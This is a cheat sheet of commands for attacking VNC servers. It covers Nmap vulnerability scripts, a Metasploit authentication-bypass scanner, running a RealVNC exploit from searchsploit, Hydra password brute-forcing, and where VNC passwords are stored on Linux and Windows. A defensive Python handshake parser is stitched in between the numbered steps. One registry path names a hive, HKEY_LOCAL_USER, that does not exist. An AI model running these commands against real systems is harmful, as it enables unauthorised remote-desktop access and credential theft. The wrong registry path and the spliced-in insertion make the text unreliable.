VNC (ports 5800, 5900)
1. Nmap - VNC Information and Vulnerability Scanning:
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5800 10.11.1.13
2. Metasploit - RealVNC Authentication Bypass
use auxiliary/scanner/vnc/vnc_none_auth
set rhosts 10.11.1.13
set rport 5800
set threads 1
run
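The vnc-info script in step 1 and the vnc_none_auth module in step 2 both read the security types a server offers in its opening RFB handshake. The following added example (not from the original page, Nmap or Metasploit) parses a handshake captured from your own server and flags the "None" type; `parse_rfb_offer`, the sample bytes, and the assumption that the client replied with the version the server announced are all assumptions of this example.

```python
import struct

# Security-type numbers as assigned in RFC 6143 and the IANA RFB registry.
SECURITY_TYPES = {1: "None", 2: "VNC Authentication", 5: "RA2", 6: "RA2ne",
                  16: "Tight", 17: "Ultra", 18: "TLS", 19: "VeNCrypt", 20: "SASL"}

def _reason(buf):
    """Decode the U32-length-prefixed reason string a server sends when it refuses."""
    n = struct.unpack(">I", buf[:4])[0] if len(buf) >= 4 else -1
    if n < 0 or len(buf) < 4 + n:
        raise ValueError("truncated failure reason")
    return buf[4:4 + n].decode("latin-1")

def parse_rfb_offer(server_bytes):
    """Return {'version', 'types', 'no_auth', 'refused'} for a captured server handshake."""
    if len(server_bytes) < 12 or server_bytes[:4] != b"RFB " or server_bytes[11:12] != b"\n":
        raise ValueError("not an RFB ProtocolVersion message")
    version = (int(server_bytes[4:7]), int(server_bytes[8:11]))
    body = server_bytes[12:]
    out = {"version": version, "types": [], "no_auth": False, "refused": None}
    if version < (3, 7):
        # RFB 3.3: the server dictates a single type as a big-endian U32.
        if len(body) < 4:
            raise ValueError("truncated security type")
        (code,) = struct.unpack(">I", body[:4])
        codes = [code] if code else []
        if not code:
            out["refused"] = _reason(body[4:])
    else:
        # RFB 3.7+: one count byte, then that many one-byte type codes.
        if not body or len(body) < 1 + body[0]:
            raise ValueError("truncated security-type list")
        codes = list(body[1:1 + body[0]])
        if not codes:
            out["refused"] = _reason(body[1:])
    out["types"] = [SECURITY_TYPES.get(c, "unknown(%d)" % c) for c in codes]
    out["no_auth"] = 1 in codes  # type 1: the desktop opens without any password
    return out

# Constructed sample captures (not from the page or from a real host).
SAMPLES = {
    "open-3.8": b"RFB 003.008\n" + bytes([2, 1, 2]),
    "password-3.8": b"RFB 003.008\n" + bytes([1, 2]),
    "legacy-3.3-open": b"RFB 003.003\n" + struct.pack(">I", 1),
    "locked-out": b"RFB 003.008\n" + b"\x00" + struct.pack(">I", 8) + b"too many",
}
if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, parse_rfb_offer(raw))
```

A server whose result has `no_auth` set should be reconfigured to require authentication or be restricted to a tunnel.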
3. RealVNC Authentication Bypass (Exploit):
sudo searchsploit -m windows/remote/36932.py
python2 36932.py #input target IP
4. Hydra - Brute-forcing VNC
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV
5. Default Password Locations
Linux (TightVNC/other): Default password is stored in:
~/.vnc/passwd
Windows - RealVNC: VNC password can be found in:
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Windows - TightVNC: Password in:
HKEY_CURRENT_USER\Software\TightVNC\Server
Windows - TigerVNC: Stored in:
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Windows - UltraVNC: VNC credentials stored in:
C:\Program Files\UltraVNC\ultravnc.ini